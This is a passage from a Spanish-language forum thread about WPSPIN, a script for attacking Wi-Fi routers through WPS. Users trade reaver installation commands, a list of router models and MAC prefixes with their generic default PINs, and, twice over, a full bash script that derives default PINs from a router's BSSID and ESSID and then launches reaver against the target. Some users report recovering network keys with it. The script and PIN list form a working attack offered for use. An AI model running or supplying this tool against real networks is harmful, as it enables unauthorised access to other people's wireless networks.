Board Stats

  • stats Total de Usuarios: 23159
  • stats Total de Mensajes: 107903
  • stats Total de Temas: 10336
  • stats Total de Categorías: 15
  • stats Total de Foros: 74
  • stats Máx. usuarios conectados (simultáneamente): 1021

Ultimo registro



Autor Tema: WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc  (Leído 392971 veces)

0 Usuarios y 1 Visitante están viendo este tema.

kcdtv

  • Visitante
Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
« Respuesta #50 en: Diciembre 12, 2012, 17:54:36 pm »
Entonces deberías des-instalar la 1.4 y instalar la 1,3

1. des-instalas

Situando te en tu directorio trunk/src en tu carpeta personal
desde tu navegador de archivos, haces click derecha en src y eleiges "abrir terminal aquí"
ahora se te abra una consola situada en la carpeta src.
escribes
Código: [Seleccionar]
./configure
Código: [Seleccionar]
sudo make distclean esto para quitar reaver 1.4

2.instalas

descargas
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.

lo descomprimes
habres la carpeta que obtinenes despues descomprimir se llama reaver 1.3, a dentro hay dos carpetas, "docs" y "src".

 y luego instalas, en la misma consola

Código: [Seleccionar]
./configure
Código: [Seleccionar]
make
Código: [Seleccionar]
sudo make install
NOTA- EDIT

INtalando la versión 113 de reaver 1.4 mediante svn, el opción p funcionna  :)

Código: [Seleccionar]
cd /tmp/; mkdir reaver
svn co http://reaver-wps.googlecode.com/svn/trunk/ reaver
 cd reaver/src
./configure
make
sudo make install
« Última modificación: Diciembre 17, 2012, 12:41:55 pm por kcdtv »

Desconectado Miguel21

  • Usuario
  • *
  • Mensajes: 86
Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
« Respuesta #51 en: Diciembre 12, 2012, 18:01:13 pm »
Entonces deberías desinstalar la 1.4 y instalar la 1,3
descargas
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.

lo descomprimes
habres la carpeta que obtinenes despues descomprimir se llama reaver 1.3, a dentro hay dos carpetas, "docs" y "src".
Haces click derecha en src y eleiges "abrir terminal aquí"
ahora se te abra una consola situada en la carpeta src.
escribes
Código: [Seleccionar]
sudo make distclean esto para quitar reaver 1.4
 y luego instalas, en la misma consola
Código: [Seleccionar]
make
Código: [Seleccionar]
sudo make install
y para volver a poner la 1.4, te descargas la 1.4 y haces el mismo pero desde la carpeta descomprimida de reaver 1.4


Gracias por ayudarme

Desconectado Balastro

  • Usuario
  • *
  • Mensajes: 16
Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
« Respuesta #52 en: Diciembre 12, 2012, 20:07:02 pm »
kcdtv, creo que tienes un pequeño bug en lo que es el "logo" de tu script.
 Te lo presento corregido en esta imagen a ver que te parece .

 http://.us/a/img708/1127/lampi.png
WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc


Saludos.
« Última modificación: Diciembre 13, 2012, 07:15:48 am por Balastro »

kcdtv

  • Visitante
Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
« Respuesta #53 en: Diciembre 12, 2012, 21:01:38 pm »
No se a que te refieres, si lo mirras en gedit es normal que no te salga como será en la terminal
La versión backtrack sale así

http://i.imm.io/OTEd.png
WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc


No le veo nada raro...  ¿No te gustan las llamas?  ;D
Las puedes quitar es código libre  ;)
« Última modificación: Diciembre 12, 2012, 21:06:01 pm por kcdtv »

Desconectado Balastro

  • Usuario
  • *
  • Mensajes: 16
Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
« Respuesta #54 en: Diciembre 12, 2012, 21:24:36 pm »
Yo, lo que creí es que la imagen de tu script era esta que ví en tu primer post...  :)

http://.us/a/img22/157/dibujolampi.png
WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc


Por eso la comparé con la que me ha salido en Backtrack... pensando que podía estar mal...je,je.
Bueno, no era mi intención desviarme del tema. La proxima vez intentaré tener más cuidado y más acierto, ya que sólo trataba de ayudar.

P.D. las llamas le quedan muy bién, el problema lo tengo yo que tengo que pasar por el oculista  8)

Sorry........


« Última modificación: Diciembre 12, 2012, 21:59:50 pm por Balastro »

Desconectado abuabdellah

  • Usuario
  • *
  • Mensajes: 115
Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
« Respuesta #55 en: Diciembre 12, 2012, 22:13:55 pm »
creo qe te has olvidado del:
 ./configure
i despues va lo de make &&make install

acid_lemon

  • Visitante
Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
« Respuesta #56 en: Diciembre 13, 2012, 00:12:29 am »
Buenas, simplemente confirmar que sirve también para redes WLAN_XX y BSSID 00:A0:26  ;)

Desconectado maripuri

  • Master
  • Usuario
  • ******
  • Mensajes: 22996
  • Mari
    • WirelessWindows
Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
« Respuesta #57 en: Diciembre 13, 2012, 10:53:08 am »
acid_lemon

¿Puedes adjuntar por privado todos los datos posibles de ese router?

Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.


El BSSID 00:A0:26 que comentas era conocido de cara a WLAN_XXXX, pero no sabíamos que pudiera estar soportado como WLAN_XX por eso te solicito todos esos datos posibles.

Gracias.
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
 
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
No preguntes sobre temas del foro por privado, participa en el.

Desconectado martin

  • Usuario
  • *
  • Mensajes: 4
Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
« Respuesta #58 en: Diciembre 14, 2012, 10:08:46 am »
Gracias por vuestro trabajo.
Queria preguntaros como debo hacer para poner el archivo descargado en el escritorio. Uso xiaopan y el navegador mozilla que lleva. Entro en opciones para ver la ruta de la descarga en mozilla pero no se que ruta debo poner para que la descarga del WPSPINS llegue al escritorio. Como veis estoy aún muy verde en linux.
Saludos

kcdtv

  • Visitante
Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
« Respuesta #59 en: Diciembre 14, 2012, 21:22:09 pm »
Se va a publicar una nueva versión de WPSPIN con unas  mejoras.
Dentro de poco los detalles...  ;)

http://i.imm.io/P7ll.png
WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc



http://i.imm.io/P7nR.png
WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
« Última modificación: Diciembre 15, 2012, 16:29:32 pm por kcdtv »

Desconectado abuabdellah

  • Usuario
  • *
  • Mensajes: 115
Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
« Respuesta #60 en: Diciembre 14, 2012, 21:45:56 pm »
Gracias por vuestro trabajo.
Queria preguntaros como debo hacer para poner el archivo descargado en el escritorio. Uso xiaopan y el navegador mozilla que lleva. Entro en opciones para ver la ruta de la descarga en mozilla pero no se que ruta debo poner para que la descarga del WPSPINS llegue al escritorio. Como veis estoy aún muy verde en linux.
Saludos
click derecho abrir carpeta de archivo, luego click derecho sobre el archivo. Y elegir extraeren escretorio. Esta  todo explicado en el primer post

kcdtv

  • Visitante
Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
« Respuesta #61 en: Diciembre 14, 2012, 23:22:06 pm »
Añadido soporte PIN genéricos descarga en post principal

kcdtv

  • Visitante
Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
« Respuesta #62 en: Diciembre 17, 2012, 12:05:14 pm »
Para simplificar la cosa, a partir de ahora dejo en fin de primer post la lista de bssid soportados a dentro de un texto con opción insertar codigó
Código: [Seleccionar]
solo tendréis que dar le a seleccionar y copiar-pegar lo para tener la lista actualizada. también a partir de ahora habrá una lista de bssid a parte del readme.txt en el paquete del programa para que podaís copiar y pegar lo fácilmente.
En un futuro mirare para que se pueda actualizar la lista automáticamente siendo conectado a Internet.

Desconectado Balastro

  • Usuario
  • *
  • Mensajes: 16
Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
« Respuesta #63 en: Diciembre 17, 2012, 18:52:00 pm »
Gracias kcdtv, como siempre haciéndonos la vida mucho más fácil.  :)

Saludos.

Desconectado jonhy_1988

  • Usuario
  • *
  • Mensajes: 22
Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
« Respuesta #64 en: Diciembre 21, 2012, 00:02:38 am »
He provado la aplicacion live cd 3.4 y se abre bien aunque con algunos errores de lectura pero no tantos como los que muestra el usuario que ha subido las fotos de backtrack, me inicia bien y el pin lo da bien pero a la hora de seleccionar la opcion 1 reaver me tira un error, sudo line comand 32 y no arranca reaver, he provado reaver 1.4 y con 13.3 tambien y sigue tirando el error,haber si sabes como editar ese fallilo kcdtv, seria lo suyo poderlo compilarlo 100% para ###Este_mensaje_y_usuario_seran_eliminados### u otros lives para los que no tenemos instalado linux.Gracias por el aportazo, mañana con tiempo subire una imagen del error haber que me puedes decir.Saludos....crack...
« Última modificación: Diciembre 26, 2012, 18:53:25 pm por jonhy_1988 »

kcdtv

  • Visitante
Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
« Respuesta #65 en: Diciembre 21, 2012, 01:34:03 am »
Por lo de "###Este_mensaje_y_usuario_seran_eliminados### 3.4"  Échale un ojo a lo que esta escrito en rojo aqui >
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
 
Respecto a modificaciones y actualizaciones, no habrá nada hasta 2013, después la resaca http://portalhacker.net/Smileys/classic/borrachos.gif
WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc

Desconectado jonhy_1988

  • Usuario
  • *
  • Mensajes: 22
Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
« Respuesta #66 en: Diciembre 21, 2012, 11:39:46 am »
Por lo de live cd 3.4"  Échale un ojo a lo que esta escrito en rojo aqui >
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
 
Respecto a modificaciones y actualizaciones, no habrá nada hasta 2013, después la resaca http://portalhacker.net/Smileys/classic/borrachos.gif
WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc


Pense que como habian expuesto sobre backtrack que tambien es un live cd se podria hablar sobra la otra live cd que yo indico,sino se puede escribir sobre la live que yo indico no volvere a escribir mas sobre ella, pero me queda la duda de porque si se puede sobre backtrack. En cuanto a las compilaciones de la aplicacion espero que llegue pronto 2013 haber si modificas algo.Felices fiestas y saludos...!!!

Este es el error que me tira tanto con reaver 1.4 como con reaver 1.3  line 432: sudo: command not found... ay solucion para ello?
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.


Uploaded with
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
« Última modificación: Diciembre 26, 2012, 18:52:54 pm por jonhy_1988 »

Desconectado abuabdellah

  • Usuario
  • *
  • Mensajes: 115
Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
« Respuesta #67 en: Diciembre 24, 2012, 17:22:15 pm »
 creo que tenes el wps desactivado ,si no, probalo con : sudo 1
espero que te serva.

nota :estas mac de jazztel no estan soporatadas i el patron no se sabe
« Última modificación: Diciembre 24, 2012, 17:27:02 pm por abuabdellah »

Desconectado jonhy_1988

  • Usuario
  • *
  • Mensajes: 22
Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
« Respuesta #68 en: Diciembre 25, 2012, 12:33:01 pm »
creo que tenes el wps desactivado ,si no, probalo con : sudo 1
espero que te serva.

nota :estas mac de jazztel no estan soporatadas i el patron no se sabe

Es mi propio router y si tiene el wps activado, a traves de reaver si me da mi key pero con la aplicacion de kcdtv me tira ese error, y la mac de mi router si esta en la lista de pins de router genericos aunque el pin generico que me da no es el mio pero no me anda la seleccion 1 para lanzar reaver, seguire haciendo pruebas y probare con router de un compi que su mac y pin si son compatibles y estan en la lista de los que no son genericos.

Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.


Uploaded with
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.


MODELOS DE ROUTEURS CON PINES GENERICOS INTEGRADOS


-----------------------------------------------
Fagricante> OBSERVA TELECOM
essid>      WLAN_XXXX
modelo>     AW4062
-----------------------------------------------

bssid soportados

00:19:15



-----------------------------------------------
Fabricante> ZYXELL
essid>      WLAN_XXXX
modelo>     P-870HW-51A V2
-----------------------------------------------

bssid soportados

40:4A:03:


-----------------------------------------------
Fabricante> OEM Shenzhen Gongjin Electronics
essid>      WLAN_XXXX
modelo>     Encore ENDSL-4R5G
-----------------------------------------------

bssid soportados

F4:3E:61:
00:1F:A4:



-----------------------------------------------
Fabricante> Comtrend
essid>      JAZZTELL_XXXX
modelo>     AR-5387un
-----------------------------------------------

bssid soportados

38:72:C0:




-----------------------------------------------
Fabricante> ADB-Broadband
essid>      WLAN_XXXX
modelo>     PDG-A4001N
-----------------------------------------------

bssid soportados

30:39:F2:
DC:0B:1A:



-----------------------------------------------
Fabricante> Comtrend
essid>      WLAN_XXXX
modelo>     Gigabit 802.11n
-----------------------------------------------

bssid soportados

00:1A:2B:









Desconectado jonhy_1988

  • Usuario
  • *
  • Mensajes: 22
Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
« Respuesta #69 en: Diciembre 25, 2012, 20:41:27 pm »
He provado tambien el wpsgenerator con wash integrado pero no
,reconose las de 3872c0 ni las de 001915------i 3039f2
les ponen como no soportadas.
Felizes fiestas a todos

A mi tampoco me reconoce el walsh esas mac pero si lanzo reaver funciona bien y obtengo el pin y la key.

Desconectado abuabdellah

  • Usuario
  • *
  • Mensajes: 115
Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
« Respuesta #70 en: Diciembre 26, 2012, 16:40:06 pm »
A mi tampoco me reconoce el walsh esas mac pero si lanzo reaver funciona bien y obtengo el pin y la key.
ahora acabo de enterarme he probado reaver de kcdtv con adaptadores ralink no va el rtl 8187 va pero no se associa ,.i con rtl 8191 va de coña.
ahora si,  no sempre la version qe hay qe mirar tambien mira de probar   los adaptadores de red

Desconectado jonhy_1988

  • Usuario
  • *
  • Mensajes: 22
Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
« Respuesta #71 en: Diciembre 26, 2012, 18:51:10 pm »
ahora acabo de enterarme he probado reaver de kcdtv con adaptadores ralink no va el rtl 8187 va pero no se associa ,.i con rtl 8191 va de coña.
ahora si,  no sempre la version qe hay qe mirar tambien mira de probar   los adaptadores de red

La imagen que te he mostrado es con un alfa rtl8187 y si me asocia; una cosilla con que distro de linux has probado el wpspin de kcdtv?
para ir yo haciendo pruebas...Saludos...

Desconectado r00tnull

  • Colaborador
  • Usuario
  • *****
  • Mensajes: 77
Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
« Respuesta #72 en: Diciembre 28, 2012, 21:49:49 pm »
Hola he hecho algunas optimizaciones, espero que les sirva :).
Código: [Seleccionar]
#!/bin/bash
# He respetado el nombre de las variables originales siempre que he podido.
# Al igual, he intentado respetar la mayoría de los textos, la intro la quite por que ocupaba mucho y además esta versión no es nada oficial.
# Changelog:  - Añadido opción -e a los reads para que sea interactivo, se pueda editar el texto que ponga el usuario, etc.
#             - Eliminación de algunas variables que no hacían falta.
#             - Simplificación de la función que genera el checksum.
#             - Simplificación de los `echo' que engloban varias lineas. Nota: no hace falta poner un echo por cada línea.
#             - Añadida verificación de MAC válida, y de ESSID FTE-XXXX, sin que se pueda bypassear.
#             - Agrupación de mac's para FTE en el `CASE'.
#             - Otros pequeños cambios.

echo "
+---------------------------------+
|  WPSPIN optimizado by r00tnull  |
|     para www.lampiweb.com       |
+---------------------------------+
|   Basada en WPSPIN de kcdtv.    |
| Respetando la licencia GPLv3.   |
| Usado algoritmo de ZaoChunsheng |
+---------------------------------+
"
read -ep "Introduce ESSID y pulsa <ENTER>: " ESSID     # Introducir el ESSID.
read -ep "Introduce BSSID y pulsa <ENTER>: " BSSID     # Intriducir el BSSID.

# Comprobamos que la MAC introducida es válida, 6 campos de 2 caracteres hexadecimales en cada uno, y que pueda acabar con espacios en blanco.
if [[ ! $BSSID =~ ^[[:xdigit:]]{2}:[[:xdigit:]]{2}:[[:xdigit:]]{2}:[[:xdigit:]]{2}:[[:xdigit:]]{2}:[[:xdigit:]]{2}[[:blank:]]*$ ]]; then
  echo "ERROR: La MAC que pusiste no tiene formato válido." >&2     # Mandamos mensaje de error por la salida de errores.
  exit 1     # Salimos con un estado 1 (error).
fi

# Función que genera el checksum. Algoritmo de ZaoChunsheng.
FUNC_CHECKSUM(){
    ACCUM=0
    while [ $PIN -ne 0 ]; do
      ACCUM=$((ACCUM += 3 * (PIN % 10)))
      PIN=$((PIN /= 10))
      ACCUM=$((ACCUM += PIN % 10))
      PIN=$((PIN /= 10))
    done
    CHECKSUM=$(((10 - ACCUM % 10) % 10))     # Por último se halla el valor para añadirlo al pin.
}

# Aquí comprobamos si el ESSID coincide con el patron FTE-XXXX. Las X deberán ser 4 caracteres hexadecimales.
if [[ $ESSID =~ ^FTE-[[:xdigit:]]{4}[[:blank:]]*$ ]]; then    # Si coincide proceder.
  FINESSID=`echo $ESSID | cut -d'-' -f2`     # Cogemos los XXXX del ESSID.
  PAREMAC=`echo $BSSID | cut -d':' -f4`     # Cogemos el par 4º del BSSID.
  MACESSID=`echo $PAREMAC$FINESSID`     # Juntamos el 4º par con el final del ESSID.
  RAIZ=`printf "%d" $((0x$MACESSID%10000000))`     # Hallamos el resto, y lo imprimimos como entero.
  STRING=$(($RAIZ+7))     # Sumamos el numero.
  PIN=$STRING     # Movemos el valor a $PIN para usarlo en el bucle
  FUNC_CHECKSUM     # Llamamos a la función.
  PINWPS4=`printf "%07d%d" $STRING $CHECKSUM`     # Guardamos el PIN en la variable.
  echo -e "\n     PIN WPS POR DEFECTO >>>>  ${PINWPS4}\n"     # Imprimimos el PIN.
  PIN4REAVER=$PINWPS4     # Lo guardamos en la variable, para pasarlo al programa.

else     # Si no coincide proceder a generar los 3 pins genéricos.
  declare -a PINWPS     # Declaramos un array donde guardaremos los 3 pins posibles.
  MAC=`echo $BSSID | awk -F':' '{ printf $4$5$6 }'`     # Separamos los últimos 3 pares del BSSID.
  n=1     # Contador para ir sumando valores del array.
  for i in 0 8 14; do     # Se ponen los casos posibles para sacar los pines, uno sin sumar nada y los otros sumando 8 y 14 respectivamente.
    STRING=`printf "%d" $((0x$MAC%10000000))`     # Hallamos el resto, y lo imprimimos como entero.
    STRING=$(($STRING+$i))     # Sumamos el valor para hallar cada pin, para el primero 0, para el segundo 8 y para el tercero 14.
    PIN=$STRING     # Movemos el valor a $PIN para usarlo en el bucle
    FUNC_CHECKSUM     # Llamamos a la función.
    PINWPS[${n}]=`printf "%07d%d" $STRING $CHECKSUM`     # Vamos guardando los tres PIN's en el array, en las posiciones 1, 2 y 3.
    n=$[$n+1]
  done

  # Revisamos los 3 primeros pares de la MAC para ofrecer el resultado.
  CHECKBSSID=$(echo $BSSID | awk -F':' '{ printf $1$2$3 }')
  case $CHECKBSSID in
  04C06F|202BC1|285FDB|80B686|84A8E4|B4749F|BC7670|CC96A0)
  echo -e "\n    ¡ el ESSID por DEFECTO es FTE-XXXX !\n"
  echo "     3 PINes POSSIBLES  > ${PINWPS[1]}"     # Imprimimos los PIN's.
  echo "                        > ${PINWPS[2]}"
  echo -e "                        > ${PINWPS[3]}\n"
  PIN4REAVER=${PINWPS[1]}
  ;;
  001915)
  echo -e "\n              modelo routeur   : OBSERVA TELECOM, AW4062\n"
  echo -e "              PIN GENERICO  > 12345670\n"
  PIN4REAVER=12345670
  ;;
  404A03)
  echo -e "\n              modelo routeur   : ZYXELL P-870HW-51A V2\n"
  echo -e "              PIN GENERICO  >  11866428\n"
  PIN4REAVER=11866428
  ;;
  F43E61)
  echo -e "\n             modelo routeur  : Encore ENDSL-4R5G de OEM Shenzhen Gongjin Electronics\n"
  echo "             PIN GENERICO  >  12345670\n"
  PIN4REAVER=12345670
  ;;
  001FA4)
  echo -e "\n            modelo routeur   : Encore ENDSL-4R5G de OEM Shenzhen Gongjin Electronics\n"
  echo -e "            PIN GENERICO  >  12345670\n"
  PIN4REAVER=12345670
  ;;
  001A2B)
  echo -e "\n             modelo routeur   : Comtrend Gigabit 802.11n\n"
  echo "             PIN GENERICO  >  88478760\n"
  PIN4REAVER=88478760
  ;;
  3872C0)
  echo -e "\n             modelo routeur  : Comtrend AR-5387un\n"
  echo "             PIN GENERICO  >    18836486\n"
  PIN4REAVER=18836486
  ;;
  3039F2)
  echo -e "\n             modelo routeur  : PDG-A4001N de ADB-Broadband\n"
  echo "             PINes GENERICOs  >  16538061  "
  echo "                              >  18355604  "
  echo "                              >  88202907  "
  PIN4REAVER=16538061
  ;;
  DC0B1A)
  echo -e "\n            modelo routeur  : PDG-A4001N de ADB-Broadband\n"
  echo "            PINes GENERICOs  >  16538061  "
  echo "                             >  18355604  "
  echo "                             >  88202907  "
  PIN4REAVER=16538061
  ;;
  *)
  echo -e "\n          PIN WPS POR DEFECTO >>>>   ${PINWPS[1]} \n"
  PIN4REAVER=${PINWPS[1]}
  ;;
  esac
fi

echo "---------------------------------------------------------------------"
echo -e "\n[*] Elegir una opción.
   1 > Atacar con reaver (con mode monitor ya activado en mon0)
       El PIN empleado será $PIN4REAVER
   2 > Probar otra red
   3 > Salir
"
read -ep "Entrar número opción y darle a <ENTER> : " CHOISE

case $CHOISE in
1)
sudo reaver -b $BSSID -p $PIN4REAVER -i mon0 -t 2 -vv
;;
2)
./WPSPIN.sh
;;
*) echo "Saludos de kcdtv y r00tnull :p"
sleep 1
exit
;;
esac
Descarga del source:
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.


kcdtv no me importaría colaborar con usted en este proyecto, me parece una buena iniciativa :).
Saludos.
*************************
*    Linux member #545609   *
*************************

Desconectado maripuri

  • Master
  • Usuario
  • ******
  • Mensajes: 22996
  • Mari
    • WirelessWindows
Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
« Respuesta #73 en: Diciembre 28, 2012, 22:20:30 pm »

r00tnull, gracias por el aporte.. todo lo que sea aportar bien recibido es, como he dicho siempre el foro somos tod@s y tod@s debemos de encargarnos de que crezca.   ;)

kcdtv está fuera por las fiestas, a fin de año o a primeros regresará y os responderá a tod@s en este subforo, de momento pinty_102 que tampoco tiene mucho tiempo lo puede atender y vostros mismos los usuarios.

Un saludo.
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
 
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
No preguntes sobre temas del foro por privado, participa en el.

Desconectado ñanduti

  • Usuario
  • *
  • Mensajes: 258
Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
« Respuesta #74 en: Diciembre 29, 2012, 00:23:12 am »
Hola he hecho algunas optimizaciones, espero que les sirva :).
Código: [Seleccionar]
#!/bin/bash
# He respetado el nombre de las variables originales siempre que he podido.
# Al igual, he intentado respetar la mayoría de los textos, la intro la quite por que ocupaba mucho y además esta versión no es nada oficial.
# Changelog:  - Añadido opción -e a los reads para que sea interactivo, se pueda editar el texto que ponga el usuario, etc.
#             - Eliminación de algunas variables que no hacían falta.
#             - Simplificación de la función que genera el checksum.
#             - Simplificación de los `echo' que engloban varias lineas. Nota: no hace falta poner un echo por cada línea.
#             - Añadida verificación de MAC válida, y de ESSID FTE-XXXX, sin que se pueda bypassear.
#             - Agrupación de mac's para FTE en el `CASE'.
#             - Otros pequeños cambios.

echo "
+---------------------------------+
|  WPSPIN optimizado by r00tnull  |
|     para www.lampiweb.com       |
+---------------------------------+
|   Basada en WPSPIN de kcdtv.    |
| Respetando la licencia GPLv3.   |
| Usado algoritmo de ZaoChunsheng |
+---------------------------------+
"
read -ep "Introduce ESSID y pulsa <ENTER>: " ESSID     # Introducir el ESSID.
read -ep "Introduce BSSID y pulsa <ENTER>: " BSSID     # Intriducir el BSSID.

# Comprobamos que la MAC introducida es válida, 6 campos de 2 caracteres hexadecimales en cada uno, y que pueda acabar con espacios en blanco.
if [[ ! $BSSID =~ ^[[:xdigit:]]{2}:[[:xdigit:]]{2}:[[:xdigit:]]{2}:[[:xdigit:]]{2}:[[:xdigit:]]{2}:[[:xdigit:]]{2}[[:blank:]]*$ ]]; then
  echo "ERROR: La MAC que pusiste no tiene formato válido." >&2     # Mandamos mensaje de error por la salida de errores.
  exit 1     # Salimos con un estado 1 (error).
fi

# Función que genera el checksum. Algoritmo de ZaoChunsheng.
FUNC_CHECKSUM(){
    ACCUM=0
    while [ $PIN -ne 0 ]; do
      ACCUM=$((ACCUM += 3 * (PIN % 10)))
      PIN=$((PIN /= 10))
      ACCUM=$((ACCUM += PIN % 10))
      PIN=$((PIN /= 10))
    done
    CHECKSUM=$(((10 - ACCUM % 10) % 10))     # Por último se halla el valor para añadirlo al pin.
}

# Aquí comprobamos si el ESSID coincide con el patron FTE-XXXX. Las X deberán ser 4 caracteres hexadecimales.
if [[ $ESSID =~ ^FTE-[[:xdigit:]]{4}[[:blank:]]*$ ]]; then    # Si coincide proceder.
  FINESSID=`echo $ESSID | cut -d'-' -f2`     # Cogemos los XXXX del ESSID.
  PAREMAC=`echo $BSSID | cut -d':' -f4`     # Cogemos el par 4º del BSSID.
  MACESSID=`echo $PAREMAC$FINESSID`     # Juntamos el 4º par con el final del ESSID.
  RAIZ=`printf "%d" $((0x$MACESSID%10000000))`     # Hallamos el resto, y lo imprimimos como entero.
  STRING=$(($RAIZ+7))     # Sumamos el numero.
  PIN=$STRING     # Movemos el valor a $PIN para usarlo en el bucle
  FUNC_CHECKSUM     # Llamamos a la función.
  PINWPS4=`printf "%07d%d" $STRING $CHECKSUM`     # Guardamos el PIN en la variable.
  echo -e "\n     PIN WPS POR DEFECTO >>>>  ${PINWPS4}\n"     # Imprimimos el PIN.
  PIN4REAVER=$PINWPS4     # Lo guardamos en la variable, para pasarlo al programa.

else     # Si no coincide proceder a generar los 3 pins genéricos.
  declare -a PINWPS     # Declaramos un array donde guardaremos los 3 pins posibles.
  MAC=`echo $BSSID | awk -F':' '{ printf $4$5$6 }'`     # Separamos los últimos 3 pares del BSSID.
  n=1     # Contador para ir sumando valores del array.
  for i in 0 8 14; do     # Se ponen los casos posibles para sacar los pines, uno sin sumar nada y los otros sumando 8 y 14 respectivamente.
    STRING=`printf "%d" $((0x$MAC%10000000))`     # Hallamos el resto, y lo imprimimos como entero.
    STRING=$(($STRING+$i))     # Sumamos el valor para hallar cada pin, para el primero 0, para el segundo 8 y para el tercero 14.
    PIN=$STRING     # Movemos el valor a $PIN para usarlo en el bucle
    FUNC_CHECKSUM     # Llamamos a la función.
    PINWPS[${n}]=`printf "%07d%d" $STRING $CHECKSUM`     # Vamos guardando los tres PIN's en el array, en las posiciones 1, 2 y 3.
    n=$[$n+1]
  done

  # Revisamos los 3 primeros pares de la MAC para ofrecer el resultado.
  CHECKBSSID=$(echo $BSSID | awk -F':' '{ printf $1$2$3 }')
  case $CHECKBSSID in
  04C06F|202BC1|285FDB|80B686|84A8E4|B4749F|BC7670|CC96A0)
  echo -e "\n    ¡ el ESSID por DEFECTO es FTE-XXXX !\n"
  echo "     3 PINes POSSIBLES  > ${PINWPS[1]}"     # Imprimimos los PIN's.
  echo "                        > ${PINWPS[2]}"
  echo -e "                        > ${PINWPS[3]}\n"
  PIN4REAVER=${PINWPS[1]}
  ;;
  001915)
  echo -e "\n              modelo routeur   : OBSERVA TELECOM, AW4062\n"
  echo -e "              PIN GENERICO  > 12345670\n"
  PIN4REAVER=12345670
  ;;
  404A03)
  echo -e "\n              modelo routeur   : ZYXELL P-870HW-51A V2\n"
  echo -e "              PIN GENERICO  >  11866428\n"
  PIN4REAVER=11866428
  ;;
  F43E61)
  echo -e "\n             modelo routeur  : Encore ENDSL-4R5G de OEM Shenzhen Gongjin Electronics\n"
  echo "             PIN GENERICO  >  12345670\n"
  PIN4REAVER=12345670
  ;;
  001FA4)
  echo -e "\n            modelo routeur   : Encore ENDSL-4R5G de OEM Shenzhen Gongjin Electronics\n"
  echo -e "            PIN GENERICO  >  12345670\n"
  PIN4REAVER=12345670
  ;;
  001A2B)
  echo -e "\n             modelo routeur   : Comtrend Gigabit 802.11n\n"
  echo "             PIN GENERICO  >  88478760\n"
  PIN4REAVER=88478760
  ;;
  3872C0)
  echo -e "\n             modelo routeur  : Comtrend AR-5387un\n"
  echo "             PIN GENERICO  >    18836486\n"
  PIN4REAVER=18836486
  ;;
  3039F2)
  echo -e "\n             modelo routeur  : PDG-A4001N de ADB-Broadband\n"
  echo "             PINes GENERICOs  >  16538061  "
  echo "                              >  18355604  "
  echo "                              >  88202907  "
  PIN4REAVER=16538061
  ;;
  DC0B1A)
  echo -e "\n            modelo routeur  : PDG-A4001N de ADB-Broadband\n"
  echo "            PINes GENERICOs  >  16538061  "
  echo "                             >  18355604  "
  echo "                             >  88202907  "
  PIN4REAVER=16538061
  ;;
  *)
  echo -e "\n          PIN WPS POR DEFECTO >>>>   ${PINWPS[1]} \n"
  PIN4REAVER=${PINWPS[1]}
  ;;
  esac
fi

echo "---------------------------------------------------------------------"
echo -e "\n[*] Elegir una opción.
   1 > Atacar con reaver (con mode monitor ya activado en mon0)
       El PIN empleado será $PIN4REAVER
   2 > Probar otra red
   3 > Salir
"
read -ep "Entrar número opción y darle a <ENTER> : " CHOISE

case $CHOISE in
1)
sudo reaver -b $BSSID -p $PIN4REAVER -i mon0 -t 2 -vv
;;
2)
./WPSPIN.sh
;;
*) echo "Saludos de kcdtv y r00tnull :p"
sleep 1
exit
;;
esac
Descarga del source:
